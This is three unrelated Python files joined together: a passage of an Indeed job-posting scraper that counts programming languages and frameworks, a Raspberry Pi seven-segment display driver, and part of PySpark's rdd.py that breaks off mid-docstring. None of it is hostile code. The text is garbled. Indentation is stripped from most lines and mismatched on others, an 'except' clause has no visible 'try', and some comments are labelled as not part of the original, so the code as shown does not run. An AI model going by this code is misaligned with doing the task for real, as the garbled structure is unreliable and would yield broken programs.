print(f'Parsing results {count + 1} - {count + 15}: url = {url}')
response = requests.get(url, headers=headers)
soup = BeautifulSoup(response.text, 'html.parser') if response.status_code == 200 else None
if soup is None:
return f'Error: GET request to Indeed using {url} returned status code {response.status_code}.'
                raw_cards = soup.select('a.tapItem.fs-unmask.result')
                if not raw_cards:  # select() returns a list, never None
                    return f'Error: no job cards found.\nCheck the url: {response.url}'
parsed_cards = self.parse_card_details(cards = [self.get_card(raw_card) for raw_card in raw_cards])
self.cards.extend(parsed_cards)
except AttributeError:
                print('AttributeError: no "Next" link found on this results page.')
continue
'''
# Multithreaded approach of retrieving all cards.
thread_url_template = self.url + '&start={}'
result_count = 10
for count in range(15, self.max_results, 15):
url = thread_url_template.format(result_count)
print(f'Attempting to GET results {count + 1} - {count + 15}. url = {url}')
thread = Thread(target=self.get_raw_cards, args=(url,))
thread.start()
thread.join() # Removed concurrent execution to reduce CAPTCHA likelihood because this is too fast for Indeed.
result_count += 10
'''
def get_raw_cards(self, url: str) -> None:
'''
This method will make a thread-safe GET request to Indeed.
The thread executing this function will append the found cards into self.cards.
'''
response = requests.get(url, headers=self.http_headers)
        soup = BeautifulSoup(response.text, 'html.parser') if response.status_code == 200 else None
        if soup is None:
            return f'Error: GET request to Indeed using {response.url} returned status code {response.status_code}.'
        raw_cards = soup.select('a.tapItem.fs-unmask.result')
        if not raw_cards:  # select() returns a list, never None
            return f'Error: no job cards found.\nCheck the url: {response.url}'
self.cards.extend([self.get_card(raw_card) for raw_card in raw_cards])
def get_card(self, raw_card) -> JobCardModel:
'''
Takes an individual 'raw_card' and returns a processed 'card' object
with a card id, job title, company name, company rating, company location, and job link.
'''
card_content = raw_card.find('td')
company_content = card_content.find('div', class_='companyInfo')
self.card_id += 1
try:
# Job Link (href)
url = 'https://www.indeed.com' + raw_card.get('href')
# Job Title
title = card_content.find('span', title=True).get_text()
# Company Name
company = company_content.find('span', 'companyName').get_text()
# Company Rating
raw_rating = company_content.find('span', 'ratingNumber')
rating = raw_rating.get_text() if raw_rating else 'None'
# Company Location
raw_location = company_content.find('div', 'companyLocation')
location = raw_location.get_text() if raw_location else 'None Found'
# Posting Date
date = raw_card.find('span', 'date').get_text()
return JobCardModel(self.card_id, title, company, rating, location, date, url)
except AttributeError:
print(f'Missing field in card {self.card_id}.')
return
def get_url(self, position, *args) -> str:
''' Builds and returns query url based on position (what) and location (where). '''
if len(args) == 0:
template_url = 'https://www.indeed.com/jobs?q={}&l'
return template_url.format(position)
else:
template_url = 'https://www.indeed.com/jobs?q={}&l={}'
return template_url.format(position, args[0])
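    # Illustrative usage of get_url() (not part of the original file):
    #
    #   self.get_url('software+engineer')
    #   # -> 'https://www.indeed.com/jobs?q=software+engineer&l'
    #   self.get_url('software+engineer', 'new+york')
    #   # -> 'https://www.indeed.com/jobs?q=software+engineer&l=new+york'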
def parse_card_details(self, cards):
''' Parses through all individual job posts, updates the metrics data, and returns parsed cards. '''
count = 0
for card in cards:
if card:
count += 1
card.details.programming_languages = copy.deepcopy(JobMetricsModel.pl)
card.details.frameworks = copy.deepcopy(JobMetricsModel.f)
thread = Thread(target=self.update_card_metrics, args=(card,))
thread.start()
thread.join()
else:
                print('Card is None; skipping.')
        for card in cards:
            if card and card.details.thread_suceeded:
                self.success_count += 1
            else:
                self.failure_count += 1
return cards
def update_card_metrics(self, card: JobCardModel) -> None:
''' Makes a GET request to an individual job post and updates the associated cards' metrics. '''
if card is None:
print(f'Card is {card}. Cannot attempt to update_card_metrics.')
return
        if not card.url:  # covers both None and the empty string
print(f'Thread {card.card_id} failed: Could not make GET request to the specified url. Url = {card.url}')
return
# Make GET request and retrieve raw_text.
response = requests.get(card.url, headers=self.http_headers)
        soup = BeautifulSoup(response.text, 'html.parser') if response.status_code == 200 else None
        if soup is None:
            print(f'Error: GET request to Indeed using {card.url} returned status code {response.status_code}.')
            return
# Find the job description's (raw) text.
raw_text = soup.find('div', attrs={'id': 'jobDescriptionText'})
if raw_text is not None:
split_text = raw_text.get_text(separator=' ').lower().replace('/', ' ').replace(',', ' ').replace('-', ' ').split()
else:
print(f'Thread {card.card_id} failed: raw_text is None.\nDetails: response_link = {response.url}')
return
# Clean (again) the job text into list of individual words (word vector).
translation_table = dict.fromkeys(map(ord, ".:;?|=~!@'(){}[]"), None) # List of chars to remove.
clean_words = [word.translate(translation_table).strip() for word in split_text]
# Iterate through each word in the job description.
for word in clean_words:
flagged = False
# Iterate through each programming language in self.programming_languages.
for pl in card.details.programming_languages:
if type(pl[0]) == list:
                    # Iterate through all mnemonics of this programming language and check if any matches the word.
for p in pl[0]:
if p == word:
pl[1] = True
flagged = True
break
else:
continue
else:
# Check if the word is a programming language.
if pl[0] == word:
pl[1] = True
flagged = True
# If this word turned out to be a programming language, break from checking other
# programming languages and flag to self.frameworks that they need not be checked either.
if flagged:
break
else:
continue
# If the word was a programming language, continue to the next word.
if flagged:
continue
# Else, proceed with checking if word is a framework using same thread as above.
for framework in card.details.frameworks:
if type(framework[0]) == list:
for f in framework[0]:
if f == word:
framework[1] = True
flagged = True
break
else:
continue
else:
if framework[0] == word:
framework[1] = True
flagged = True
if flagged:
break
else:
continue
card.details.thread_suceeded = True
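    # A simpler alternative sketch (not part of the original class): if every
    # skill were keyed by a flat alias-to-name dict, the nested per-word scan
    # above could become a single set-membership pass, e.g.:
    #
    #   aliases = {'js': 'javascript', 'javascript': 'javascript', 'py': 'python'}
    #   found = {aliases[w] for w in clean_words if w in aliases}
    #
    # The alias table here is hypothetical; the real names live in JobMetricsModel.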
class JobDataService:
''' This class serves as a data analysis engine for a list of JobDetailsModel. '''
cards = []
pl_counts = copy.deepcopy(JobDataModel.pl)
f_counts = copy.deepcopy(JobDataModel.f)
def __init__(self, cards) -> None:
        ''' Constructor; flattens a collection of card lists into self.cards. '''
self.cards = []
for card in cards:
self.cards += card
def reset_counts(self):
        ''' Reset all counts to zero. '''
for pl in self.pl_counts:
pl[1] = 0
for f in self.f_counts:
f[1] = 0
def get_counts(self):
''' Parses through cards and sets the count of every pl. '''
if not any(self.cards):
print('Cards is empty. Returning None for now.')
return
for card in self.cards:
index = 0
for pl in card.details.programming_languages:
if pl[1]:
self.pl_counts[index][1] += 1
index += 1
index = 0
for f in card.details.frameworks:
if f[1]:
self.f_counts[index][1] += 1
index += 1
def filter_counts(self):
''' Sorts the counts lists in descending order and returns the top 10 items. '''
self.pl_counts = sorted(self.pl_counts, key=lambda pl: pl[1], reverse=True)[:10]
self.f_counts = sorted(self.f_counts, key=lambda f: f[1], reverse=True)[:10]
|
digital_display.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright (c) 2015 NXEZ.COM.
# http://www.nxez.com
#
# Licensed under the GNU General Public License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.gnu.org/licenses/gpl-2.0.html
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import RPi.GPIO as GPIO
import time
import re
from threading import Thread
class DigitalDisplay(object):
'''
Digital display class
'''
__pins = {'seg':[], 'sel':[]}
__real_true = GPIO.HIGH
__numbers = []
__is_flushing = False
__number_code = [0x3f, 0x06, 0x5b, 0x4f, 0x66, 0x6d, 0x7d, 0x07, 0x7f, 0x6f, 0x00, 0x40]
def __init__(self, pins, real_true = GPIO.HIGH):
'''
Init the digital display
        :param pins: pin numbers as a dict with 'seg' and 'sel' arrays
:param real_true: GPIO.HIGH or GPIO.LOW
:return: void
'''
self.__pins = pins
self.__real_true = real_true
try:
t1 = Thread(target = self.flush_4bit)
t1.setDaemon(True)
t1.start()
except:
print("Error: Unable to start thread by DigitalDisplay")
    # Status.
@property
def numbers(self):
'''
Get the current numbers array showing
:return: numbers array
'''
return self.__numbers
#@numbers.setter
def set_numbers(self, value):
'''
Set the numbers array to show
:return: void
'''
        pattern = re.compile(r'[-#\d]\.?')  # a digit, '-' or '#', optionally followed by '.'
matches = pattern.findall(value)
#del self.__numbers
self.__numbers = []
for i in range(len(matches)):
self.__numbers.append(matches[i])
#print(self.__numbers)
#@numbers.deleter
#def numbers(self):
# del self.__numbers
#Verbs.
def on(self):
'''
Set display on
:return: void
'''
self.__is_flushing = True
def off(self):
'''
Set display off
:return: void
'''
self.__is_flushing = False
for p in self.__pins['sel'] + self.__pins['seg']:
GPIO.output(p, not self.__real_true)
    def show(self, value):
'''
Set the numbers array to show and enable the display
:return: void
'''
self.__is_flushing = False
        self.set_numbers(value)
self.__is_flushing = True
#print(self.__numbers)
def flush_bit(self, sel, num, dp):
if num == '#':
num = 10
elif num == '-':
num = 11
else:
num = int(num)
GPIO.output(self.__pins['sel'][sel], self.__real_true)
n = self.__number_code[num]
if dp:
            n = n | 0b10000000  # set the decimal-point segment bit
for i in range(8):
if (n & (1 << i)):
GPIO.output(self.__pins['seg'][i], self.__real_true)
GPIO.output(self.__pins['sel'][sel], not self.__real_true)
for i in self.__pins['seg']:
GPIO.output(i, not self.__real_true)
def flush_4bit(self):
while True:
if self.__is_flushing:
#print(self.__numbers)
#print(range(min(4, len(self.__numbers))))
try:
for i in range(min(4, len(self.__numbers))):
                        self.flush_bit(i, self.__numbers[i].replace('.', ''), '.' in self.__numbers[i])
time.sleep(0.001)
                except:
                    pass  # __numbers may change mid-iteration; skip this refresh cycle
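# A minimal usage sketch (not part of the original file; the pin numbers are
# hypothetical and BCM numbering is assumed):
#
#   GPIO.setmode(GPIO.BCM)
#   pins = {'seg': [2, 3, 4, 17, 27, 22, 10, 9], 'sel': [5, 6, 13, 19]}
#   for p in pins['seg'] + pins['sel']:
#       GPIO.setup(p, GPIO.OUT)
#   display = DigitalDisplay(pins, real_true=GPIO.HIGH)
#   display.show("12.34")   # multiplexing runs on the daemon thread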
|
rdd.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import copy
from collections import defaultdict
from itertools import chain, ifilter, imap
import operator
import os
import sys
import shlex
from subprocess import Popen, PIPE
from tempfile import NamedTemporaryFile
from threading import Thread
import warnings
import heapq
import bisect
import random
from math import sqrt, log, isinf, isnan, pow, ceil
from pyspark.serializers import NoOpSerializer, CartesianDeserializer, \
BatchedSerializer, CloudPickleSerializer, PairDeserializer, \
PickleSerializer, pack_long, AutoBatchedSerializer
from pyspark.join import python_join, python_left_outer_join, \
python_right_outer_join, python_full_outer_join, python_cogroup
from pyspark.statcounter import StatCounter
from pyspark.rddsampler import RDDSampler, RDDRangeSampler, RDDStratifiedSampler
from pyspark.storagelevel import StorageLevel
from pyspark.resultiterable import ResultIterable
from pyspark.shuffle import Aggregator, InMemoryMerger, ExternalMerger, \
get_used_memory, ExternalSorter
from pyspark.traceback_utils import SCCallSiteSync
from py4j.java_collections import ListConverter, MapConverter
__all__ = ["RDD"]
# TODO: for Python 3.3+, PYTHONHASHSEED should be reset to disable randomized
# hash for string
def portable_hash(x):
"""
    This function returns a consistent hash code for builtin types, especially
    for None and tuples containing None.
    The algorithm is similar to the one used by CPython 2.7
>>> portable_hash(None)
0
>>> portable_hash((None, 1)) & 0xffffffff
219750521
"""
if x is None:
return 0
if isinstance(x, tuple):
h = 0x345678
for i in x:
h ^= portable_hash(i)
h *= 1000003
h &= sys.maxint
h ^= len(x)
if h == -1:
h = -2
return h
return hash(x)
class BoundedFloat(float):
"""
Bounded value is generated by approximate job, with confidence and low
bound and high bound.
>>> BoundedFloat(100.0, 0.95, 95.0, 105.0)
100.0
"""
def __new__(cls, mean, confidence, low, high):
obj = float.__new__(cls, mean)
obj.confidence = confidence
obj.low = low
obj.high = high
return obj
def _parse_memory(s):
"""
Parse a memory string in the format supported by Java (e.g. 1g, 200m) and
return the value in MB
>>> _parse_memory("256m")
256
>>> _parse_memory("2g")
2048
"""
units = {'g': 1024, 'm': 1, 't': 1 << 20, 'k': 1.0 / 1024}
if s[-1] not in units:
raise ValueError("invalid format: " + s)
return int(float(s[:-1]) * units[s[-1].lower()])
class RDD(object):
"""
A Resilient Distributed Dataset (RDD), the basic abstraction in Spark.
Represents an immutable, partitioned collection of elements that can be
operated on in parallel.
"""
def __init__(self, jrdd, ctx, jrdd_deserializer=AutoBatchedSerializer(PickleSerializer())):
self._jrdd = jrdd
self.is_cached = False
self.is_checkpointed = False
self.ctx = ctx
self._jrdd_deserializer = jrdd_deserializer
self._id = jrdd.id()
self._partitionFunc = None
def _pickled(self):
return self._reserialize(AutoBatchedSerializer(PickleSerializer()))
def id(self):
"""
A unique ID for this RDD (within its SparkContext).
"""
return self._id
def __repr__(self):
return self._jrdd.toString()
def __getnewargs__(self):
# This method is called when attempting to pickle an RDD, which is always an error:
raise Exception(
"It appears that you are attempting to broadcast an RDD or reference an RDD from an "
"action or transformation. RDD transformations and actions can only be invoked by the "
"driver, not inside of other transformations; for example, "
"rdd1.map(lambda x: rdd2.values.count() * x) is invalid because the values "
"transformation and count action cannot be performed inside of the rdd1.map "
"transformation. For more information, see SPARK-5063."
)
@property
def context(self):
"""
The L{SparkContext} that this RDD was created on.
"""
return self.ctx
def cache(self):
"""
Persist this RDD with the default storage level (C{MEMORY_ONLY_SER}).
"""
self.is_cached = True
self.persist(StorageLevel.MEMORY_ONLY_SER)
return self
def persist(self, storageLevel=StorageLevel.MEMORY_ONLY_SER):
"""
Set this RDD's storage level to persist its values across operations
after the first time it is computed. This can only be used to assign
a new storage level if the RDD does not have a storage level set yet.
If no storage level is specified defaults to (C{MEMORY_ONLY_SER}).
>>> rdd = sc.parallelize(["b", "a", "c"])
>>> rdd.persist().is_cached
True
"""
self.is_cached = True
javaStorageLevel = self.ctx._getJavaStorageLevel(storageLevel)
self._jrdd.persist(javaStorageLevel)
return self
def unpersist(self):
"""
Mark the RDD as non-persistent, and remove all blocks for it from
memory and disk.
"""
self.is_cached = False
self._jrdd.unpersist()
return self
def checkpoint(self):
"""
Mark this RDD for checkpointing. It will be saved to a file inside the
checkpoint directory set with L{SparkContext.setCheckpointDir()} and
all references to its parent RDDs will be removed. This function must
be called before any job has been executed on this RDD. It is strongly
recommended that this RDD is persisted in memory, otherwise saving it
on a file will require recomputation.
"""
self.is_checkpointed = True
self._jrdd.rdd().checkpoint()
def isCheckpointed(self):
"""
Return whether this RDD has been checkpointed or not
"""
return self._jrdd.rdd().isCheckpointed()
def getCheckpointFile(self):
"""
Gets the name of the file to which this RDD was checkpointed
"""
checkpointFile = self._jrdd.rdd().getCheckpointFile()
if checkpointFile.isDefined():
return checkpointFile.get()
def map(self, f, preservesPartitioning=False):
"""
Return a new RDD by applying a function to each element of this RDD.
>>> rdd = sc.parallelize(["b", "a", "c"])
>>> sorted(rdd.map(lambda x: (x, 1)).collect())
[('a', 1), ('b', 1), ('c', 1)]
"""
def func(_, iterator):
return imap(f, iterator)
return self.mapPartitionsWithIndex(func, preservesPartitioning)
def flatMap(self, f, preservesPartitioning=False):
"""
Return a new RDD by first applying a function to all elements of this
RDD, and then flattening the results.
>>> rdd = sc.parallelize([2, 3, 4])
>>> sorted(rdd.flatMap(lambda x: range(1, x)).collect())
[1, 1, 1, 2, 2, 3]
>>> sorted(rdd.flatMap(lambda x: [(x, x), (x, x)]).collect())
[(2, 2), (2, 2), (3, 3), (3, 3), (4, 4), (4, 4)]
"""
def func(s, iterator):
return chain.from_iterable(imap(f, iterator))
return self.mapPartitionsWithIndex(func, preservesPartitioning)
def mapPartitions(self, f, preservesPartitioning=False):
"""
Return a new RDD by applying a function to each partition of this RDD.
>>> rdd = sc.parallelize([1, 2, 3, 4], 2)
>>> def f(iterator): yield sum(iterator)
>>> rdd.mapPartitions(f).collect()
[3, 7]
"""
def func(s, iterator):
return f(iterator)
return self.mapPartitionsWithIndex(func, preservesPartitioning)
def mapPartitionsWithIndex(self, f, preservesPartitioning=False):
"""
Return a new RDD by applying a function to each partition of this RDD,
while tracking the index of the original partition.
>>> rdd = sc.parallelize([1, 2, 3, 4], 4)
>>> def f(splitIndex, iterator): yield splitIndex
>>> rdd.mapPartitionsWithIndex(f).sum()
6
"""
return PipelinedRDD(self, f, preservesPartitioning)
def mapPartitionsWithSplit(self, f, preservesPartitioning=False):
"""
Deprecated: use mapPartitionsWithIndex instead.
Return a new RDD by applying a function to each partition of this RDD,
while tracking the index of the original partition.
>>> rdd = sc.parallelize([1, 2, 3, 4], 4)
>>> def f(splitIndex, iterator): yield splitIndex
>>> rdd.mapPartitionsWithSplit(f).sum()
6
"""
warnings.warn("mapPartitionsWithSplit is deprecated; "
"use mapPartitionsWithIndex instead", DeprecationWarning, stacklevel=2)
return self.mapPartitionsWithIndex(f, preservesPartitioning)
def getNumPartitions(self):
"""
Returns the number of partitions in RDD
>>> rdd = sc.parallelize([1, 2, 3, 4], 2)
>>> rdd.getNumPartitions()
2
"""
return self._jrdd.partitions().size()
def filter(self, f):
"""
Return a new RDD containing only the elements that satisfy a predicate.
>>> rdd = sc.parallelize([1, 2, 3, 4, 5])
>>> rdd.filter(lambda x: x % 2 == 0).collect()
[2, 4]
"""
def func(iterator):
return ifilter(f, iterator)
return self.mapPartitions(func, True)
def distinct(self, numPartitions=None):
"""
Return a new RDD containing the distinct elements in this RDD.
>>> sorted(sc.parallelize([1, 1, 2, 3]).distinct().collect())
[1, 2, 3]
"""
return self.map(lambda x: (x, None)) \
.reduceByKey(lambda x, _: x, numPartitions) \
.map(lambda (x, _): x)
def sample(self, withReplacement, fraction, seed=None):
"""
Return a sampled subset of this RDD.
>>> rdd = sc.parallelize(range(100), 4)
>>> rdd.sample(False, 0.1, 81).count()
10
"""
assert fraction >= 0.0, "Negative fraction value: %s" % fraction
return self.mapPartitionsWithIndex(RDDSampler(withReplacement, fraction, seed).func, True)
def randomSplit(self, weights, seed=None):
"""
Randomly splits this RDD with the provided weights.
:param weights: weights for splits, will be normalized if they don't sum to 1
:param seed: random seed
:return: split RDDs in a list
>>> rdd = sc.parallelize(range(5), 1)
>>> rdd1, rdd2 = rdd.randomSplit([2, 3], 17)
>>> rdd1.collect()
[1, 3]
>>> rdd2.collect()
[0, 2, 4]
"""
s = float(sum(weights))
cweights = [0.0]
for w in weights:
cweights.append(cweights[-1] + w / s)
if seed is None:
seed = random.randint(0, 2 ** 32 - 1)
return [self.mapPartitionsWithIndex(RDDRangeSampler(lb, ub, seed).func, True)
for lb, ub in zip(cweights, cweights[1:])]
# this is ported from scala/spark/RDD.scala
def takeSample(self, withReplacement, num, seed=None):
"""
Return a fixed-size sampled subset of this RDD.
>>> rdd = sc.parallelize(range(0, 10))
>>> len(rdd.takeSample(True, 20, 1))
20
>>> len(rdd.takeSample(False, 5, 2))
5
>>> len(rdd.takeSample(False, 15, 3))
10
"""
numStDev = 10.0
if num < 0:
raise ValueError("Sample size cannot be negative.")
elif num == 0:
return []
initialCount = self.count()
if initialCount == 0:
return []
rand = random.Random(seed)
if (not withReplacement) and num >= initialCount:
# shuffle current RDD and return
samples = self.collect()
rand.shuffle(samples)
return samples
maxSampleSize = sys.maxint - int(numStDev * sqrt(sys.maxint))
if num > maxSampleSize:
raise ValueError(
"Sample size cannot be greater than %d." % maxSampleSize)
fraction = RDD._computeFractionForSampleSize(
num, initialCount, withReplacement)
samples = self.sample(withReplacement, fraction, seed).collect()
# If the first sample didn't turn out large enough, keep trying to take samples;
# this shouldn't happen often because we use a big multiplier for their initial size.
# See: scala/spark/RDD.scala
while len(samples) < num:
# TODO: add log warning for when more than one iteration was run
seed = rand.randint(0, sys.maxint)
samples = self.sample(withReplacement, fraction, seed).collect()
rand.shuffle(samples)
return samples[0:num]
@staticmethod
def _computeFractionForSampleSize(sampleSizeLowerBound, total, withReplacement):
"""
Returns a sampling rate that guarantees a sample of
size >= sampleSizeLowerBound 99.99% of the time.
How the sampling rate is determined:
Let p = num / total, where num is the sample size and total is the
total number of data points in the RDD. We're trying to compute
q > p such that
- when sampling with replacement, we're drawing each data point
with prob_i ~ Pois(q), where we want to guarantee
Pr[s < num] < 0.0001 for s = sum(prob_i for i from 0 to
total), i.e. the failure rate of not having a sufficiently large
sample < 0.0001. Setting q = p + 5 * sqrt(p/total) is sufficient
to guarantee 0.9999 success rate for num > 12, but we need a
slightly larger q (9 empirically determined).
- when sampling without replacement, we're drawing each data point
with prob_i ~ Binomial(total, fraction) and our choice of q
guarantees 1-delta, or 0.9999 success rate, where success rate is
defined the same as in sampling with replacement.
"""
fraction = float(sampleSizeLowerBound) / total
if withReplacement:
numStDev = 5
if (sampleSizeLowerBound < 12):
numStDev = 9
return fraction + numStDev * sqrt(fraction / total)
else:
delta = 0.00005
gamma = - log(delta) / total
return min(1, fraction + gamma + sqrt(gamma * gamma + 2 * gamma * fraction))
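    # Illustrative numbers (not part of the original source): for
    # sampleSizeLowerBound=100 and total=10000 without replacement,
    # fraction = 0.01 and gamma = -log(5e-5) / 10000 ~= 9.9e-4, so the
    # returned rate is roughly 0.01 + 9.9e-4 + 4.6e-3 ~= 0.016,
    # comfortably above the naive 0.01.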
def union(self, other):
"""
Return the union of this RDD and another one.
>>> rdd = sc.parallelize([1, 1, 2, 3])
>>> rdd.union(rdd).collect()
[1, 1, 2, 3, 1, 1, 2, 3]
"""
if self._jrdd_deserializer == other._jrdd_deserializer:
rdd = RDD(self._jrdd.union(other._jrdd), self.ctx,
self._jrdd_deserializer)
return rdd
else:
# These RDDs contain data in different serialized formats, so we
# must normalize them to the default serializer.
self_copy = self._reserialize()
other_copy = other._reserialize()
return RDD(self_copy._jrdd.union(other_copy._jrdd), self.ctx,
self.ctx.serializer)
def intersection(self, other):
"""
Return the intersection of this RDD and another one. The output will
not contain any duplicate elements, even if the input RDDs did.
Note that this method performs a shuffle internally.
>>> rdd1 = sc.parallelize([1, 10, 2, 3, 4, 5])
>>> rdd2 = sc.parallelize([1, 6, 2, 3, 7, 8])
>>> rdd1.intersection(rdd2).collect()
[1, 2, 3]
"""
return self.map(lambda v: (v, None)) \
.cogroup(other.map(lambda v: (v, None))) \
.filter(lambda (k, vs): all(vs)) \
.keys()
def _reserialize(self, serializer=None):
serializer = serializer or self.ctx.serializer
if self._jrdd_deserializer != serializer:
self = self.map(lambda x: x, preservesPartitioning=True)
self._jrdd_deserializer = serializer
return self
def __add__(self, other):
"""
Return the union of this RDD and another one.
>>> rdd = sc.parallelize([1, 1, 2, 3])
>>> (rdd + rdd).collect()
[1, 1, 2, 3, 1, 1, 2, 3]
"""
if not isinstance(other, RDD):
raise TypeError
return self.union(other)
def repartitionAndSortWithinPartitions(self, numPartitions=None, partitionFunc=portable_hash,
ascending=True, keyfunc=lambda x: x):
"""
Repartition the RDD according to the given partitioner and, within each resulting partition,
sort records by their keys.
>>> rdd = sc.parallelize([(0, 5), (3, 8), (2, 6), (0, 8), (3, 8), (1, 3)])
>>> rdd2 = rdd.repartitionAndSortWithinPartitions(2, lambda x: x % 2, 2)
>>> rdd2.glom().collect()
[[(0, 5), (0, 8), (2, 6)], [(1, 3), (3, 8), (3, 8)]]
"""
if numPartitions is None:
numPartitions = self._defaultReducePartitions()
spill = (self.ctx._conf.get("spark.shuffle.spill", 'True').lower() == "true")
memory = _parse_memory(self.ctx._conf.get("spark.python.worker.memory", "512m"))
serializer = self._jrdd_deserializer
def sortPartition(iterator):
sort = ExternalSorter(memory * 0.9, serializer).sorted if spill else sorted
return iter(sort(iterator, key=lambda (k, v): keyfunc(k), reverse=(not ascending)))
return self.partitionBy(numPartitions, partitionFunc).mapPartitions(sortPartition, True)
def sortByKey(self, ascending=True, numPartitions=None, keyfunc=lambda x: x):
"""
Sorts this RDD, which is assumed to consist of (key, value) pairs.
# noqa
>>> tmp = [('a', 1), ('b', 2), ('1', 3), ('d', 4), ('2', 5)]
>>> sc.parallelize(tmp).sortByKey().first()
('1', 3)
>>> sc.parallelize(tmp).sortByKey(True, 1).collect()
[('1', 3), ('2', 5), ('a', 1), ('b', 2), ('d', 4)]
>>> sc.parallelize(tmp).sortByKey(True, 2).collect()
[('1', 3), ('2', 5), ('a', 1), ('b', 2), ('d', 4)]
>>> tmp2 = [('Mary', 1), ('had', 2), ('a', 3), ('little', 4), ('lamb', 5)]
>>> tmp2.extend([('whose', 6), ('fleece', 7), ('was', 8), ('white', 9)])
>>> sc.parallelize(tmp2).sortByKey(True, 3, keyfunc=lambda k: k.lower()).collect()
[('a', 3), ('fleece', 7), ('had', 2), ('lamb', 5),...('white', 9), ('whose', 6)]
"""
if numPartitions is None:
numPartitions = self._defaultReducePartitions()
spill = (self.ctx._conf.get("spark.shuffle.spill", 'True').lower() == 'true')
memory = _parse_memory(self.ctx._conf.get("spark.python.worker.memory", "512m"))
serializer = self._jrdd_deserializer
def sortPartition(iterator):
sort = ExternalSorter(memory * 0.9, serializer).sorted if spill else sorted
return iter(sort(iterator, key=lambda (k, v): keyfunc(k), reverse=(not ascending)))
if numPartitions == 1:
if self.getNumPartitions() > 1:
self = self.coalesce(1)
return self.mapPartitions(sortPartition, True)
# first compute the boundary of each part via sampling: we want to partition
# the key-space into bins such that the bins have roughly the same
# number of (key, value) pairs falling into them
rddSize = self.count()
if not rddSize:
return self # empty RDD
maxSampleSize = numPartitions * 20.0 # constant from Spark's RangePartitioner
fraction = min(maxSampleSize / max(rddSize, 1), 1.0)
samples = self.sample(False, fraction, 1).map(lambda (k, v): k).collect()
samples = sorted(samples, reverse=(not ascending), key=keyfunc)
        # we have numPartitions many parts but one of them has
# an implicit boundary
bounds = [samples[len(samples) * (i + 1) / numPartitions]
for i in range(0, numPartitions - 1)]
def rangePartitioner(k):
p = bisect.bisect_left(bounds, keyfunc(k))
if ascending:
return p
else:
return numPartitions - 1 - p
return self.partitionBy(numPartitions, rangePartitioner).mapPartitions(sortPartition, True)
def sortBy(self, keyfunc, ascending=True, numPartitions=None):
"""
Sorts this RDD by the given keyfunc
>>> tmp = [('a', 1), ('b', 2), ('1', 3), ('d', 4), ('2', 5)]
>>> sc.parallelize(tmp).sortBy(lambda x: x[0]).collect()
[('1', 3), ('2', 5), ('a', 1), ('b', 2), ('d', 4)]
>>> sc.parallelize(tmp).sortBy(lambda x: x[1]).collect()
[('a', 1), ('b', 2), ('1', 3), ('d', 4), ('2', 5)]
"""
return self.keyBy(keyfunc).sortByKey(ascending, numPartitions).values()
def glom(self):
"""
Return an RDD created by coalescing all elements within each partition
into a list.
>>> rdd = sc.parallelize([1, 2, 3, 4], 2)
>>> sorted(rdd.glom().collect())
[[1, 2], [3, 4]]
"""
def func(iterator):
yield list(iterator)
return self.mapPartitions(func)
def cartesian(self, other):
"""
Return the Cartesian product of this RDD and another one, that is, the
RDD of all pairs of elements C{(a, b)} where C{a} is in C{self} and
C{b} is in C{other}.
>>> rdd = sc.parallelize([1, 2])
>>> sorted(rdd.cartesian(rdd).collect())
[(1, 1), (1, 2), (2, 1), (2, 2)]
"""
# Due to batching, we can't use the Java cartesian method.
deserializer = CartesianDeserializer(self._jrdd_deserializer,
other._jrdd_deserializer)
return RDD(self._jrdd.cartesian(other._jrdd), self.ctx, deserializer)
def groupBy(self, f, numPartitions=None):
"""
Return an RDD of grouped items.
>>> rdd = sc.parallelize([1, 1, 2, 3, 5, 8])
>>> result = rdd.groupBy(lambda x: x % 2).collect()
>>> sorted([(x, sorted(y)) for (x, y) in result])
[(0, [2, 8]), (1, [1, 1, 3, 5])]
"""
return self.map(lambda x: (f(x), x)).groupByKey(numPartitions)
def pipe(self, command, env={}):
"""
Return an RDD created by piping elements to a forked external process.
>>> sc.parallelize(['1', '2', '', '3']).pipe('cat').collect()
['1', '2', '', '3']
"""
def func(iterator):
pipe = Popen(
shlex.split(command), env=env, stdin=PIPE, stdout=PIPE)
def pipe_objs(out):
for obj in iterator:
out.write(str(obj).rstrip('\n') + '\n')
out.close()
Thread(target=pipe_objs, args=[pipe.stdin]).start()
return (x.rstrip('\n') for x in iter(pipe.stdout.readline, ''))
return self.mapPartitions(func)
def foreach(self, f):
"""
Applies a function to all elements of this RDD.
>>> def f(x): print x
>>> sc.parallelize([1, 2, 3, 4, 5]).foreach(f)
"""
def processPartition(iterator):
for x in iterator:
f(x)
return iter([])
self.mapPartitions(processPartition).count() # Force evaluation
def foreachPartition(self, f):
"""
Applies a function to each partition of this RDD.
>>> def f(iterator):
... for x in iterator:
... print x
>>> sc.parallelize([1, 2, 3, 4, 5]).foreachPartition(f)
"""
def func(it):
r = f(it)
try:
return iter(r)
except TypeError:
return iter([])
self.mapPartitions(func).count() # Force evaluation
def collect(self):
"""
Return a list that contains all of the elements in this RDD.
"""
with SCCallSiteSync(self.context) as css:
bytesInJava = self._jrdd.collect().iterator()
return list(self._collect_iterator_through_file(bytesInJava))
def _collect_iterator_through_file(self, iterator):
# Transferring lots of data through Py4J can be slow because
# socket.readline() is inefficient. Instead, we'll dump the data to a
# file and read it back.
tempFile = NamedTemporaryFile(delete=False, dir=self.ctx._temp_dir)
tempFile.close()
self.ctx._writeToFile(iterator, tempFile.name)
# Read the data into Python and deserialize it:
with open(tempFile.name, 'rb') as tempFile:
for item in self._jrdd_deserializer.load_stream(tempFile):
yield item
os.unlink(tempFile.name)
def reduce(self, f):
"""
Reduces the elements of this RDD using the specified commutative and
associative binary operator. Currently reduces partitions locally.
>>> from operator import add
